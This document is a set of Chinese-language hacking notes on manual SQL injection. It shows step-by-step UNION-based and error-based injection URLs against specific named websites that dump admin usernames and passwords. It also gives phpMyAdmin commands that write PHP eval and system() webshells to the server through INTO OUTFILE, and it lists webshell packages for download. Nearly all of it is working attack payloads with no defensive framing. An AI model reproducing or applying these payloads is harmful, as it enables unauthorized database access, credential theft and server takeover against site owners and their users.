手工注入笔记↓
一.
检测字段长度
http://www.osy-wine.com/news_show.php?id=-61 order by 24 报错 说明字段长度是24
查看数据库信息
http://www.osy-wine.com/news_show.php?id=-61+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
http://www.osy-wine.com/news_show.php?id=-61+union+select+1,user(),3,4,database(),version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
user() ----------osywine@115.160.154.39
version()--------5.0.91-log 版本
5.0以上的版本都带有一个information_schema的虚拟库里面存放的是所有库的信息.
database()-------osywine
二.
利用虚拟库information_schema 报表
http://www.osy-wine.com/news_show.php?id=-61+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.tables+where+table_schema=0x6F737977696E65+limit+1,1
0x6F737977696E65 是osywine 16进制 0x6F737977696E6520
在添加limit+0,1 limit+1,1 limit+0,1 查询下一个
爆出admin这张表
三.
利用表爆字段
http://www.osy-wine.com/news_show.php?id=-61+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E
爆出id
http://www.osy-wine.com/news_show.php?id=-61+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E+limit+1,1
爆出username
http://www.osy-wine.com/news_show.php?id=-61+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E+limit+2,1
爆出password
http://www.osy-wine.com/news_show.php?id=-61+union+select+1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+admin
直接爆用户密码
**********************************************************************************
第二种方法(比较方便,速度)
一次性报爆表
http://www.osy-wine.com/news_show.php?id=-61+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_schema=0x6F737977696E65
0x6F737977696E65 是16进制的osywine
所有的表如下:
aboutweb,admin,blog,ggao,liuyan,member,news,news_class,news_class2,photo,photo_class,products,products_class,products_class2,settle_accounts,shoping,youqinglj
接下来就是最后一步。。。用户名和密码直接暴出。。。。
http://www.osy-wine.com/news_show.php?id=-61+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+username,0x5f,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+admin
注:这里面所有的+号是代替空格的,还可以用/**/来代替,不同情况,不同分析!
快速暴表
and 1=2 union select group_concat(table_name) from information_schema.tables where table_schema=0x636164657475725F6361646532303036 (当前库的十六进制)
http://www.cadeturcr.com/nuevo/pags/detalle_oferta.php?id=600 and 1=2 union select 1,2,group_concat(table_name),database(),user(),6,7,8,9 from information_schema.tables where table_schema=0x636164657475725F6361646532303036
快速暴字段
and 1=2 union select group_concat(column_name) from information_schema.columns where table_name=表
双暴字段内容(0x3a 是:的意思)
and 1=2 union select 1,group_concat(username,0x3a,password),3,4,5 from 表 这个表不用十六进制
爆所有库and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
爆当前数据库
and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,hex(cast(database() as char)),0x27,0x7e)) frominformation_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
爆表
and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,hex(cast(table_name as char)),0x27,0x7e) from information_schema.tables where table_schema=hex库名 limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
爆字段
and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema=库名 and table_name=表名 limit 0,1)) frominformation_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
爆内容
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,表名.字段,0x27,0x7e) from 表名 limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
一次性爆出所有字段
http://www.osy-wine.com/news_show.php?id=-61+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E
0x61646D696E 是admin的16进制
所有字段如下;
id,username,password
大马+一句话(PHP).rar
类型:
售价:0
大小:12KB
下载:0次
描述:
大马+一句话(ASP).rar
类型:
售价:0
大小:102KB
下载:0次
描述:
phpadmin拿Shell
root 密码第一种
CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL );INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES ('<?php @eval($_POST[pass]);?>');
SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE 'd:/wamp/www/darkmoon.php';DROP TABLE IF EXISTS `darkmoon`;
第二种方法
Create TABLE moon (darkmoon text NOT NULL);Insert INTO moon (darkmoon) VALUES('<?php @eval($_POST[pass]);?>');
select darkmoon from moon into outfile 'd:/wamp/www/darkmoon2.php';Drop TABLE IF EXISTS moon;
第三种方法:
select '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/darkmoon3.php'
第四种方法select '<?php echo \'
\';system($_GET[\'cmd\']); echo \'\'; ?>' INTO OUTFILE 'd:/wamp/www/darkmoon4.php'
127.0.0.1/darkmoon4.php?cmd=net user
php暴路径的所有1、单引号爆路径
说明:直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。
[url]www.xxx.com/news.php?id=149